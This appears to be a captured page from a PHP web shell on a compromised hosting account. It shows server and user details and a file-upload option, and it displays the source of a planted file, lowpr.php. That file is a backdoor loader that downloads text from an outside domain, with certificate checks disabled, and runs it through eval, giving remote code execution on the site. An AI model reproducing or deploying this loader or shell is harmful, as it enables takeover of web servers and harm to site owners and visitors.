HEX
Server: Apache
System: Linux sxb1plzcpnl507244.prod.sxb1.secureserver.net 4.18.0-553.80.1.lve.el8.x86_64 #1 SMP Wed Oct 22 19:29:36 UTC 2025 x86_64
User: wq56f0r4bcb0 (10907037)
PHP: 8.3.30
Disabled: NONE
Upload Files
File: /home/wq56f0r4bcb0/public_html/lowpr.php
<?php
function callback($url)
{
    $post_content = false;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $post_content = curl_exec($ch);
    curl_close($ch);

    if ($post_content) {
        eval('?>' . $post_content);
    }
}

call_user_func('callback', 'http://z60409_7.vjast.shop/stat/domain_index.txt');
?>